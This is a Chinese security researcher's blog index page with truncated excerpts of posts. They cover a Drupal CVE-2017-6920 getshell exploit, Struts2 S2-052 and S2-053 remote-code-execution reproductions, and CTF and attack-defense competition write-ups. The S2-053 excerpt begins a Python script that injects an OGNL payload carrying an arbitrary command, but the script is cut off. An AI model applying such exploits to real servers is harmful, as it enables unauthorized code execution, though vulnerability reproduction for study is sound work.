kerling

热爱安全。php python 低级coder 。爱美食爱电影爱二次元。0.3阶狼人杀玩家

CVE-2017-6920 getshell exp


CVE-2017-6920
复现

 

0X1 前言

先参考了文章 https://paper.seebug.org/334/

ADLAB给出的是poc无参数执行函数 call_user_func($this->_fn_close) 

了解下call_user_func就知道这个其实 并无危害。。。 另外给出了composer vendor中的cookie操作的插件。指出可以shell却没有给出PAYLOAD。于是便有了本文。

0x2 环境搭建

获取环境:
  1. 拉取镜像到本地

$ docker pull medicean...

2017-12-16

st2-053 rce 利用

是由于Freemarker处理hidden标签的时候带入了ognl表达式执行之中产生了rce 这里写一个执行命令的exp 根据poc改的

# -*- coding:utf-8 -*-  

import re,requests,sys

web=sys.argv[1]

param=sys.argv[2]

cmd='echo "[|"`'+sys.argv[3]+'`"|]"'

#print cmd

payload="%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS

2017-09-09

ST2-052 poc详细复现过程

环境部署

Ubuntu 14.25 +docker

先拉取镜像


$ docker pull medicean/vulapps:s_struts2_s2-052


然后启动

docker run -d -p 80:8080 medicean/vulapps:s_struts2_s2-052

然后物理机访问成功


Poc复现

根据漏洞原理,仅需要POST相应xml数据即可不需要考虑特定的url 因此构造poc


Xml部分:


<map> 

<entry> 

<jdk...

2017-09-06

调用魔术方法php小马复现

发布了长文章:调用魔术方法php小马复现

点击查看

2017-07-20

第三届绿盟杯广西网络安全竞赛线下赛wp(北斗天璇)

by ramsm0 (北斗天璇)

本文为线下赛复盘内容,由于比赛激烈 截图较少。请各位朋友谅解指正。

比赛分为30 个队伍 每个队伍拥有两台机器

大致情况如上图 选手和靶机分在两个vlan 选手机之间无法互相访问。但是靶机之间可以互相访问(这是一个细节 刚开始尝试一些漏洞就因为没注意网络环境,exp反弹的msf session未成功吃了大亏)

比赛开始之后 先有一个小时的时间进行靶机加固。

两台靶机分别预装了 wordpress 以及phpcms,这时候我使用一下语句顺利找到了wp的一句话密码

find ....

2017-07-10

ISCC 200WEB SQLI

    Part1 题目解析

这道题目是我出的,作为去年决赛时候的评分标准之一,没想到被主办方拿出来当了今年的题目用。源码找不到只能po一张半成品时候的图


代码po在这里就很明白了,就是一个简单的注入修改过的代码是md5(password)了的。 不过我在前端加了个验证码,代码如下:

function getCaptcha($length){

$str = null;

$strPol = "0123456789abcdef";

$max = strlen($strPol)-1;


for...

2017-05-31

对某CTF题目的一次解题过程

发布了长文章:对某CTF题目的一次解题过程

点击查看

发布了长文章:《对某CTF题目的一次解题过程》

2017-03-27

一个py fuzz 脚本

前几天看到一个奇怪的ctf题目 是一个后台 然后 使用 user:sssss pass:aaaaaa  提示用户不存在 之后使用 usaer:admin pass:sssss 提示长度不正确 之后 fuzz一下发现长度是9 接下来 输入 fssssssss 发现返回对比 第一位失败 所以写了如下py 脚本。。。虽然比较弱鸡 但是好歹是原创- -

#coding=utf-8

import requests


dicts=[]

num=range(0,10...

2016-12-25

gxnnctf 线下攻防wp

flag:方式 curl 10.0.2.1

上去直接先部署360waf 并且把回显改为用js返回上一页 来避免被举报 2333

然后 

cd /var/apache2/www/&&dir

之后发现一个html 和html2然后端口扫描发现一个tomcat 刚开始以为是 反序列化,所以试了很多exp都不行。。。然后被人拿分了 遂看目录

试了几下发现 html 和html2目录分别为一个 wordpress 和一个 kuaifancms(至今不懂 - -) wp发现默认密码 ...

2016-12-08

gxnnctf 线上wp

发布了长文章:gxnnctf 线上wp

点击查看

发布了长文章:《gxnnctf 线上wp》

2016-12-08
1 / 2

© kerling | Powered by LOFTER